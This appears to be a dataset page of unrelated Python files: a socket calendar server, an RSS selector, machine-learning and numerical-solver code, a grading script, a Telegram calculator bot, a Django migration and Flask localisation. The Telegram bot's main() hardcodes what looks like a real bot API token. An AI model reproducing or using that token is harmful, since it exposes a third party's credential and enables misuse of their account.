gcm.send()
log += "\nGCM Outbound: %s" % device.device_token
log += "\n ---------------------------- \n"
return log
|
import socket
import threading
# class for creating servers
class Server:
def __init__(self):
self.SERVER = "127.0.0.1"
self.PORT = 8080
self.ADDR = (self.SERVER, self.PORT)
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind(self.ADDR)
def start(self):
calendar.struct_calendar()
self.server.listen()
while True:
conn, addr = self.server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print("Active connections", threading.active_count() - 1)
# Class for creating calendars
class Month:
user_meetings = {}
calendar_page = []
def __init__(self):
self.months = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
self.months_name = [
"january", "february", "march", "april",
"may", "june", "july", "august", "september",
"october", "november", "december"
]
# add activities to the activity list
def add_activity(self, activity):
date = activity.date.split("/")
month = int(date[0])
day = int(date[1])
if str(month) in self.user_meetings:
if str(day) in self.user_meetings[str(month)]:
self.user_meetings[str(month)][str(day)].append(activity)
else:
self.user_meetings[str(month)][str(day)] = [activity]
else:
self.user_meetings[str(month)] = {}
self.user_meetings[str(month)][str(day)] = [activity]
# get an activity
def get_activities(self, month, day):
day = str(day)
month = str(month)
stringify = ""
if month in self.user_meetings:
if day in self.user_meetings[month]:
for value in self.user_meetings[month][day]:
stringify += f"""
---------------------------------------------------------
By {value.user.username} Date: {value.date}
{value.title}
-----------Description-----------
{value.description}
---------------------------------------------------------\n"""
return stringify
stringify = "No meetings on that day"
return stringify
# fetch a month
def fetch_month(self, month):
try:
month = int(month)
except ValueError:
month = str(month)
if isinstance(month, int):
if month < 1 or month > 12:
return False
else:
selected_month_name = self.months_name[month-1]
selected_month = month - 1
else:
if month in self.months_name:
selected_month_name = [i for i in self.months_name if month in i]
selected_month = self.months_name.index(selected_month_name[0])
else:
return False
month = selected_month
return month
# struct the calendar
def struct_calendar(self):
for i in range(len(self.months)):
y = []
y.append(self.months_name[i])
for j in range(1, self.months[i]+1):
y.append(j)
self.calendar_page.append(y)
def add_calendar_activity(self, date):
splitted = date.split("/")
month = int(splitted[0])
day = int(splitted[1])
currentMonth = self.calendar_page[month-1]
for i in currentMonth:
if i == day:
currentMonth[i] = "X"
# class for creating activities
class Activity:
def __init__(self, date, title, description):
self.date = date
self.title = title
self.description = description
self.user = ""
# class creating new clients
class Client:
def __init__(self, addr):
self.username = ""
self.addr = addr
def set_username(self, username):
self.username = username
# creating new calendar by default
calendar = Month()
welcome_message = """
----------------
Welcome to the calendar!
These are the menus you can use
calendar - Open and select a month to see your currently booked meetings
add - Add a new meeting
help - bring up the menu again
exit - Quit application
----------------
"""
# check if day is valid
def check_day(day, month):
try:
day = int(day)
month = int(month)
except ValueError:
return False
check = calendar.months[month]
if day < 1 or day > check:
return False
else:
return True
# check if date is valid
def check_date(date):
if "/" in date:
splittedDate = date.split("/")
try:
month = int(splittedDate[0])
day = int(splittedDate[1])
except ValueError:
return False
if month <= 12 and month >= 1:
if day <= calendar.months[month-1] and day >= 1:
return True
return False
else:
return False
# send calendar to client
def send_calendar(calendar):
stringify = "["
num = 0
for i in calendar:
stringify += f" {i} "
if num % 7 == 0:
stringify += "]\n["
num += 1
return f"{stringify}]"
def handle_activity(date, title, description, user):
newActivity = Activity(date.decode(), title, description)
newActivity.user = user
calendar.add_activity(newActivity)
# check calendar for activities based on input
def read_calender(conn, calendar):
conn.send(b'Which month do you want to fetch? Input either a number or by month name')
data = conn.recv(1024)
month = calendar.fetch_month(data.decode())
if month is not False:
string = send_calendar(calendar.calendar_page[month])
conn.send(string.encode() + b'\nInput a day you want to check')
while True:
day = conn.recv(1024)
if check_day(day.decode(), month):
meetings = calendar.get_activities(month+1, day.decode())
conn.send(meetings.encode())
else:
conn.send(b"Returning to main menu")
break
else:
conn.send(b'Input invalid')
def create_user(conn, user):
conn.send(b'What is your name?')
data = conn.recv(1024)
if data:
user.set_username(data.decode())
conn.send(b"Welcome user: " + user.username.encode() + welcome_message.encode())
def help_page(conn):
conn.send(welcome_message.encode())
# create new activity
def create_activity(conn):
conn.send(b'Which date is the meeting?')
date = conn.recv(1024)
if check_date(date.decode()):
conn.send(b'What is the title of your meeting?')
title = conn.recv(1024)
conn.send(b'Give your meeting a description.')
description = conn.recv(1024)
return date, title, description
else:
conn.send(b"Error not a date")
return False, False, False
# main menu for each new thread
def handle_client(conn, addr):
print("New connection")
connected = True
user = Client(addr)
while connected:
if not user.username:
create_user(conn, user)
else:
data = conn.recv(1024)
if data:
print(f"Received string from {user.username}: {data.decode()}")
# -----Exit application-----
if (data.decode()).lower() == "exit":
connected = False
elif (data.decode()).lower() == "help":
help_page(conn)
# -----Add new activity-----
elif (data.decode()).lower() == "add":
date, title, description = create_activity(conn)
if date is not False:
handle_activity(date, title.decode(), description.decode(), user)
calendar.add_calendar_activity(date.decode())
conn.send(b"New meeting added! \nReturning to main menu.")
# -----Check the calendar and activities-----
elif (data.decode()).lower() == "calendar":
read_calender(conn, calendar)
# runs if the command doesn't exist
else:
conn.send(b'Not a command')
else:
connected = False
break
print(f"{user.username} has disconnected")
conn.send(b'You have disconnected')
conn.close()
# starts server and make it listen for new connections
def start_new_server():
print("Starting server...")
server = Server()
server.start()
if __name__ == '__main__':
start_new_server()
|
class Site:
#init parameters: self, users site + section from IRC.
def __init__(self, siteInput, sectionInput):
self.siteInput = siteInput
self.sectionInput = sectionInput
self.retTargetSite()
#Function to return target RSS/XML file for parsing.
def retTargetSite(self):
#Define a list of current available feeds.
sites = ['irishtimes', 'rte', 'bbc']
#Dictionaries for site sections.
irishtimes = { 'main' :'http://www.irishtimes.com/feeds/rss/newspaper/index.rss', 'ireland' : 'http://www.irishtimes.com/feeds/rss/breaking/irish.rss', 'world' : 'http://www.irishtimes.com/feeds/rss/breaking/world.rss', 'business' : 'http://www.irishtimes.com/feeds/rss/breaking/business.rss', 'sport' : 'http://www.irishtimes.com/feeds/rss/breaking/sports.rss', 'technology' :'http://www.irishtimes.com/feeds/rss/breaking/technology.rss'}
rte = { 'main' : 'http://www.rte.ie/rss/news.xml', 'sports' :
'http://www.rte.ie/rss/sport.xml', 'business' :
'http://www.rte.ie/rss/business.xml', 'entertainment' :
'http://www.rte.ie/rss/entertainment.xml' }
bbc = {'headlines' : 'http://feeds.bbci.co.uk/news/rss.xml', 'world' : 'http://feeds.bbci.co.uk/news/world/rss.xml', 'uk' : 'http://feeds.bbci.co.uk/news/uk/rss.xml', 'business' : 'http://feeds.bbci.co.uk/news/business/rss.xml', 'politics' : 'http://feeds.bbci.co.uk/news/politics/rss.xml', 'health' : 'http://feeds.bbci.co.uk/news/health/rss.xml', 'education' : 'http://feeds.bbci.co.uk/news/education/rss.xml', 'science' : 'http://feeds.bbci.co.uk/news/science_and_environment/rss.xml', 'technology' : 'http://feeds.bbci.co.uk/news/technology/rss.xml', 'arts' : 'http://feeds.bbci.co.uk/news/entertainment_and_arts/rss.xml'}
#If the site is in the sites list, search the dictionaries for the
#users section from IRC and return the corresponding XML/RSS link.
if(self.siteInput in sites):
if(self.siteInput == 'irishtimes'):
for section in irishtimes.iterkeys():
if(self.sectionInput == section):
return irishtimes[section]
elif(self.siteInput == 'rte'):
for section in rte.iterkeys():
if(self.sectionInput==section):
return rte[section]
elif(self.siteInput == 'bbc'):
for section in bbc.iterkeys():
if(self.sectionInput==section):
return bbc[section]
#If not, return None.
elif(self.siteInput not in sites):
return None
|
# from Geron, 14_recurrent_neural_networks
# Demonstrate an RNN with two time steps, hardcoded
import numpy as np
import tensorflow as tf
def reset_graph(seed=42):
tf.reset_default_graph()
tf.set_random_seed(seed)
np.random.seed(seed)
reset_graph()
n_inputs = 3
n_neurons = 5
X0 = tf.placeholder(tf.float32, [None, n_inputs])
X1 = tf.placeholder(tf.float32, [None, n_inputs])
Wx = tf.Variable(tf.random_normal(shape=[n_inputs, n_neurons],dtype=tf.float32))
Wy = tf.Variable(tf.random_normal(shape=[n_neurons,n_neurons],dtype=tf.float32))
b = tf.Variable(tf.zeros([1, n_neurons], dtype=tf.float32))
Y0 = tf.tanh(tf.matmul(X0, Wx) + b) # first output does not depend on previous
Y1 = tf.tanh(tf.matmul(Y0, Wy) + tf.matmul(X1, Wx) + b) # next output
init = tf.global_variables_initializer()
# create some data (3 inputs)
# Minibatch: instance 0 instance 1 instance 2 instance 3
X0_batch = np.array([[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 0, 1]]) # t = 0
X1_batch = np.array([[9, 8, 7], [0, 0, 0], [6, 5, 4], [3, 2, 1]]) # t = 1
with tf.Session() as sess:
init.run()
Y0_val, Y1_val = sess.run([Y0, Y1], feed_dict={X0: X0_batch, X1: X1_batch})
print(Y0_val) # output at time t=0
# prints instance 0 \\ instance 1 \\ instance 2 \\ instance 3
print(Y1_val) # output at time t=0
# prints instance 0 \\ instance 1 \\ instance 2 \\ instance 3
|
from PyQt4 import QtCore, QtGui
import sys, os
# Import the new defined class here.
from MainScreen import *
def _init():
app = QApplication(sys.argv)
window = MainWindow()
window.show()
window.raise_()
app.exec_()
_init()
|
import numpy as np
from NumericalModeling.scripts.matrix_generator import *
import sys
def read_input_file(input_path):
f = open(input_path, "r")
f1 = f.readlines()
str1 = list(map(float, f1[0].split(' ')))
f = float(str1[1])
M = int(str1[1])
eps = float(str1[2])
G = []
for x in f1[1:]:
G.append(np.array(list(map(float, x.split(' ')))))
G = np.stack(G)
return f, M, eps, G
def smoother(A, b, x0=None, eps=1e-10, max_iter=1000):
if A.shape[0]!=A.shape[1]:
x = -1
iter_n = 0
return x, iter_n
n = A.shape[0]
iter_n = 0
err=1
if x0 is not None:
x = x0
else:
x = np.zeros(n)+eps
while ((err>=eps) and (iter_n<max_iter)):
x0 = x
for i in range(n):
x[i] = b[i]-A[i, :]@x+A[i, i]*x[i]
x[i] = x[i]/A[i, i]
iter_n+=1
err = max(abs(x0-x))
return x, iter_n
def vcycle(level, A_list, R_list, b, x0, direct, PR_coef, pre_steps=1, pos_steps=1):
A = A_list[level]
n = b.shape[0]
#solve directly
if (n<=direct):
x = np.linalg.solve(A, b)
return x
x, _ = smoother(A, b, x0=x0, eps=1e-14, max_iter=pre_steps)
R = R_list[level]
P = R.T * PR_coef
coarse_n = R.shape[0]
print("level {}, A {}, b {}, R {}, x {}".format(level, A.shape, len(b), R.shape, x.shape))
#compute residual
r = b - A@x
#restrict (project) to coarse grid
r_H = R@r
x0 = np.zeros(coarse_n)
e_H = vcycle(level+1, A_list, R_list, r_H, x0, direct, PR_coef, pre_steps, pos_steps)
#interpolate error to fine grid and correct
x = x + P@e_H
#apply post smoothing
x, _ = smoother(A, b, eps=1e-14, max_iter=pos_steps, x0=x)
return x
def multigrid_solver(A, b, pre_steps=1, pos_steps=1, rn_tol=1e-10):
pre_step = 1
pos_step = 1
n = A.shape[0]
x = np.zeros(n)
rn = np.linalg.norm(b, 2)
vcycle_cnt = 0
res_norm = []
res_norm.append(rn)
rn_stop = rn*rn_tol
PR_coef = 4
direct = 49
A_list, R_list, max_level = build_multigrid(A, direct)
while (rn > rn_stop):
x = vcycle(1, A_list, R_list, b, x, direct, PR_coef, pre_steps=pre_step, pos_steps=pos_step)
r = b - A@x
rn = np.linalg.norm(r, 2)
res_norm.append(rn)
return x, vcycle_cnt, res_norm
def poisson2d_run(G, M, f, eps):
A, b, coords = build_matrix_poisson(G, M, f)
x, vc_cnt, res_norm = multigrid_solver(A, b, rn_tol=eps)
return x, coords
#def main(argv):
# M, eps, f, G = read_input_file(argv[0])
# x = poisson2d_run(G, M, f, eps)
# #f2 = open(argv[1], "w")
#if __name__=="__main__":
# main(sys.argv[1:])
|
import os
import subprocess
import sys
import shutil
import yaml
import colorama
from colorama import Style, Fore, Back
import grading_module as gm
with open("base_config.yaml", 'r') as ymlfile:
cfg = yaml.load(ymlfile, Loader=yaml.FullLoader)
dir = cfg['dir']
methods = cfg['methods']
output_only = cfg['output_only']
check_file = cfg['check_file']
modify = cfg['modify'] # 1 is a function 2 is modify tests for output test anything else is regular output
editor = cfg['editor']
gm.validate_dirs(dir)
if modify == 1:
solutions = gm.load_f_solutions(dir['sol'])
tests = gm.load_f_tests(dir['test'])
file_sol = gm.load_solutions(dir['sol_out'])
verbose = gm.load_f_solutions(dir['sol'])
else:
solutions = gm.load_solutions(dir['sol'])
tests = gm.load_tests(dir['test'])
verbose = gm.load_readable_solutions(dir['sol'])
target_letter = ''
sys.path.insert(1, f"./{dir['sub']}")
colorama.init()
print(Style.BRIGHT)
gm.print_tests(solutions, tests)
print(Fore.WHITE)
for lab in os.listdir(f"./{dir['sub']}"):
file_info = lab.split('_')
if len(file_info) < 2 or '.py' not in lab:
continue
if target_letter != '' and file_info[0][0] < target_letter:
continue
target_letter = ''
id = file_info[1] if 'late' not in file_info[1] else file_info[2]
if 'late' in file_info[1]:
print('----------LATE LAB----------')
print(Fore.GREEN, '###################################### NEW LAB ########################################', Fore.WHITE, sep='')
print(Style.NORMAL, Back.WHITE, Fore.BLACK, f'{file_info[0]}\'s lab #ID: {id}', Back.RESET, Style.BRIGHT, '\n', sep='')
try:
temp_grade = 'r'
repeat = False
while temp_grade == 'r':
gm.grade_script(lab, dir['sub'], tests, solutions, output_only, verbose, modify=modify, methods=methods, repeat=repeat)
if check_file:
grade = gm.file_check(file_info[0], id, file_sol, verbose)
temp_grade = 'h'
repeat = False
print(Style.NORMAL, Back.WHITE, Fore.BLACK, f'{file_info[0]}\'s lab #ID: {id}', Fore.WHITE, Back.RESET, Style.BRIGHT, '\n', sep='')
while temp_grade == 'h':
print('Enter S, R, M, Q, O, H for Help, or nothing to move on.')
temp_grade = input('Option> ').lower()
if temp_grade == '':
continue
elif temp_grade == 'q':
print('Exiting')
sys.exit()
elif temp_grade == 'm':
shutil.move(f"./{dir['sub']}/{lab}", dir['grad'])
elif temp_grade == 's': # Create list of skipped?
get_letter = input('Enter first letter of last name: ')
elif temp_grade == 'o':
subprocess.run(f"{editor} \"./{dir['sub']}/{lab}\"", shell=True)
temp_grade = 'h'
elif temp_grade == 'r':
print('Repeating...')
repeat = True
else:
print("""Options:
\n - S to start from a different last name.
\n - R to repeat the last lab.
\n - M to move last lab to graded folder.
\n - Q to quit.
\n - O to open last lab in text editor, configurable in config file.
\n - H to repeat this message.\n""")
temp_grade = 'h'
except Exception as e:
print(repr(e))
print('Error occured, exiting')
sys.exit()
print()
|
import groupy
for bot in groupy.Bot.list():
bot.destroy() |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#================================= HEADER ====================================
import logging
import telegram
from telegram.error import NetworkError, Unauthorized
from time import sleep
#-------------------------------------------------------------------------------
#================================ TELEGRAM ===================================
class TelegramCtrl:
def __init__(self,token):
print("aaa")
self.bot = telegram.Bot(token)
try:
self.update_id = self.bot.get_updates()[0].update_id
except IndexError:
self.update_id = None
print("bbbb")
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
self.buffer = []
def next(self):
if len(self.buffer) > 0:
return self.buffer.pop(0)
while len(self.buffer) == 0:
try:
for task_conn in self.bot.get_updates(offset=self.update_id, timeout=10):
self.update_id = task_conn.update_id + 1
self.buffer.append( TelegramTask(task_conn) )
except NetworkError:
sleep(1)
return self.buffer.pop(0)
class TelegramTask:
def __init__(self,request):
self.request = request
self.out_raw = ""
def __del__(self):
self.flush()
def input(self):
if self.request.message:
return self.request.message.text
return ""
def output(self,value):
self.out_raw += value
self.flush()
def flush(self):
if self.out_raw != "":
self.request.message.reply_text(self.out_raw)
self.out_raw = ""
#-------------------------------------------------------------------------------
#================================== MAIN =====================================
class FPU:
def calc(self,raw):
print(raw)
words = raw.split(' ')
print(words)
for item in words:
print(item)
print(self.pilha)
if item == '+':
self.sum()
elif item == '-':
self.sub()
else:
num = int(item)
self.push(num)
def __init__(self):
self.pilha = []
def push(self,val):
self.pilha.append(val)
def pop(self):
num = self.pilha.pop()
return num
def sum(self):
a = self.pop()
b = self.pop()
self.push(a+b)
def sub(self):
b = self.pop()
a = self.pop()
self.push(a-b)
def main_tty():
calculator = FPU()
while True:
texto = input()
calculator.calc(texto)
print("Resultado(s): ", calculator.pilha)
#-------------------------------------------------------------------------------
#================================== MAIN =====================================
def main():
print("aqui")
client = TelegramCtrl('729071996:AAHkhte8uYNM_1YwO-rbItsheGmKGm6Kl88')
print("opa")
while True:
task = client.next()
raw = task.input()
calculator = FPU()
calculator.calc(raw)
task.output( str(calculator.pilha) )
#if __name__ == '__main__':
try:
main()
except (KeyboardInterrupt):
print("saindo")
#-------------------------------------------------------------------------------
|
import sys
import math
n, m = map(int, sys.stdin.readline().split(' '))
l = [0]*n
for i in range(n):
l[i] = int(sys.stdin.readline())
lb = min(l)*m//n # lower bound
ub = max(l)*math.ceil(m/n) # upper bound
mv = (lb+ub)//2
while lb<ub:
c = 0 # the number of people
for i in range(n):
c += mv//l[i]
if c < m:
lb = mv + 1
elif c > m:
ub = mv
else:
break
mv = (lb+ub)//2
s = 0
__max = 0
for i in l:
tmp = i*(mv//i)
if tmp > __max:
__max = tmp
print(__max)
|
from scipy.spatial import distance as scipy_distance
def print_content_summary(centers, coordinates, labels, tweets):
for i in range(len(centers)):
print("\n======================")
print('Cluster {} ({} tweets) is approximated by:'.format(i, list(labels).count(i)))
distances = scipy_distance.cdist([centers[i]], coordinates, "cosine")[0]
results = zip(range(len(distances)), distances)
results = sorted(results, key=lambda x: x[1])
for idx, distance in results[0:5]:
print("- ", tweets['tweet_text_clean'].values[idx].strip(), "(Score: %.3f)" % (1-distance)) |
#!env python3
# -*- coding: utf-8 -*-
import pandas as pd
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
import seaborn as sns
import numpy as np
n = 10000
a = np.random.normal(40, 30, size=n)
b = np.random.normal(60, 20, size=n)
c = np.random.normal(80, 10, size=n)
df = pd.DataFrame({
"label": ["a"] * n + ["b"] * n + ["c"] * n,
"value": np.concatenate([a, b, c])
})
sns.set_style("darkgrid")
sns.set_palette("pastel")
sns.violinplot(data=df, x="label", y="value")
plt.savefig('violinplot.png')
plt.close('all')
|
# Generated by Django 2.1.4 on 2018-12-28 21:40
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('speciality', '0003_auto_20181228_2137'),
]
operations = [
migrations.AlterField(
model_name='speciality',
name='name',
field=models.CharField(max_length=200, unique=True),
),
migrations.AlterField(
model_name='specialitydetails',
name='name',
field=models.CharField(max_length=200, unique=True),
),
migrations.AlterField(
model_name='specialitydetails',
name='speciality',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='speciality.Speciality'),
),
]
|
from flask import request, session
import flask_babel
from speaklater import make_lazy_string
from babel import Locale
DEFAULT_LOCALE = Locale('en')
TRANSLATIONS = [Locale('es')]
VALID_LOCALES = [DEFAULT_LOCALE] + TRANSLATIONS
VALID_LOCALE_CODES = [str(l) for l in VALID_LOCALES]
def configure_app(app):
def lazy_gettext(string):
'''
Like flask_babel's lazy_gettext, but doesn't interpolate strings. This
is required for integration with flask_security, which does its
own string interpolation but doesn't support i18n.
For more information, see: https://github.com/GovLab/noi2/issues/41
'''
def gettext_no_interpolate(string):
t = flask_babel.get_translations()
if t is None:
return string
return t.ugettext(string)
return make_lazy_string(gettext_no_interpolate, string)
app.config['SECURITY_MSG_UNAUTHORIZED'] = (
lazy_gettext('You do not have permission to view this resource.'), 'error')
app.config['SECURITY_MSG_EMAIL_CONFIRMED'] = (
lazy_gettext('Thank you. Your email has been confirmed.'), 'success')
app.config['SECURITY_MSG_ALREADY_CONFIRMED'] = (
lazy_gettext('Your email has already been confirmed.'), 'info')
app.config['SECURITY_MSG_INVALID_CONFIRMATION_TOKEN'] = (
lazy_gettext('Invalid confirmation token.'), 'error')
app.config['SECURITY_MSG_EMAIL_ALREADY_ASSOCIATED'] = (
lazy_gettext('%(email)s is already associated with an account.'), 'error')
app.config['SECURITY_MSG_PASSWORD_MISMATCH'] = (
lazy_gettext('Password does not match'), 'error')
app.config['SECURITY_MSG_RETYPE_PASSWORD_MISMATCH'] = (
lazy_gettext('Passwords do not match'), 'error')
app.config['SECURITY_MSG_INVALID_REDIRECT'] = (
lazy_gettext('Redirections outside the domain are forbidden'), 'error')
app.config['SECURITY_MSG_PASSWORD_RESET_REQUEST'] = (
lazy_gettext('Instructions to reset your password have been sent to %(email)s.'), 'info')
app.config['SECURITY_MSG_PASSWORD_RESET_EXPIRED'] = (
lazy_gettext('You did not reset your password within %(within)s. New '
'instructions have been sent to %(email)s.'), 'error')
app.config['SECURITY_MSG_INVALID_RESET_PASSWORD_TOKEN'] = (
lazy_gettext('Invalid reset password token.'), 'error')
app.config['SECURITY_MSG_CONFIRMATION_REQUIRED'] = (
lazy_gettext('Email requires confirmation.'), 'error')
app.config['SECURITY_MSG_CONFIRMATION_REQUEST'] = (
lazy_gettext('Confirmation instructions have been sent to %(email)s.'), 'info')
app.config['SECURITY_MSG_CONFIRMATION_EXPIRED'] = (
lazy_gettext('You did not confirm your email within %(within)s. New '
'instructions to confirm your email have been sent to '
'%(email)s.'), 'error')
app.config['SECURITY_MSG_LOGIN_EXPIRED'] = (
lazy_gettext('You did not login within %(within)s. New instructions to '
'login have been sent to %(email)s.'), 'error')
app.config['SECURITY_MSG_LOGIN_EMAIL_SENT'] = (
lazy_gettext('Instructions to login have been sent to %(email)s.'), 'success')
app.config['SECURITY_MSG_INVALID_LOGIN_TOKEN'] = (
lazy_gettext('Invalid login token.'), 'error')
app.config['SECURITY_MSG_DISABLED_ACCOUNT'] = (
lazy_gettext('Account is disabled.'), 'error')
app.config['SECURITY_MSG_EMAIL_NOT_PROVIDED'] = (
lazy_gettext('Email not provided'), 'error')
app.config['SECURITY_MSG_INVALID_EMAIL_ADDRESS'] = (
lazy_gettext('Invalid email address'), 'error')
app.config['SECURITY_MSG_PASSWORD_NOT_PROVIDED'] = (
lazy_gettext('Password not provided'), 'error')
app.config['SECURITY_MSG_PASSWORD_NOT_SET'] = (
lazy_gettext('No password is set for this user'), 'error')
app.config['SECURITY_MSG_PASSWORD_INVALID_LENGTH'] = (
lazy_gettext('Password must be at least 6 characters'), 'error')
app.config['SECURITY_MSG_USER_DOES_NOT_EXIST'] = (
lazy_gettext('Specified user does not exist'), 'error')
app.config['SECURITY_MSG_INVALID_PASSWORD'] = (
lazy_gettext('Invalid password'), 'error')
app.config['SECURITY_MSG_PASSWORDLESS_LOGIN_SUCCESSFUL'] = (
lazy_gettext('You have successfuly logged in.'), 'success')
app.config['SECURITY_MSG_PASSWORD_RESET'] = (
lazy_gettext('You successfully reset your password and you have been '
'logged in automatically.'), 'success')
app.config['SECURITY_MSG_PASSWORD_IS_THE_SAME'] = (
lazy_gettext('Your new password must be different than your previous password.'), 'error')
app.config['SECURITY_MSG_PASSWORD_CHANGE'] = (
lazy_gettext('You successfully changed your password.'), 'success')
app.config['SECURITY_MSG_LOGIN'] = (
lazy_gettext('Please log in to access this page.'), 'info')
app.config['SECURITY_MSG_REFRESH'] = (
lazy_gettext('Please reauthenticate to access this page.'), 'info')
def init_app(app):
babel = app.extensions['babel']
@babel.localeselector
def get_locale():
if 'locale' in session and session['locale'] in VALID_LOCALE_CODES:
return session['locale']
return request.accept_languages.best_match(VALID_LOCALE_CODES)
# This forces any "lazy strings" like those returned by
# lazy_gettext() to be evaluated.
app.login_manager.localize_callback = unicode
def change_session_locale(locale, session=session):
if locale in VALID_LOCALE_CODES:
session['locale'] = str(locale)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.